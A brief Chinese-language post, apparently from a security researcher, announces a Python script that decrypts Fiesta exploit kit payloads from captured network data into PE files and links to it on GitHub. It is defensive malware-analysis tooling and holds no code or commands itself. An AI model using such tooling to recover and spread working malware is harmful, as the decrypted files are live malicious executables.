我寫了一個可以從網絡數據中解密任何Fiesta payload的Python腳本,已經在最近10個Fiesta EK上測試過了,兩個參數,第一個是需要解密文件,第二個是輸出文件,將會輸出有效的PE文件:
https://github.com/0x3a/tools/blob/master/fiesta-payload-decrypter.py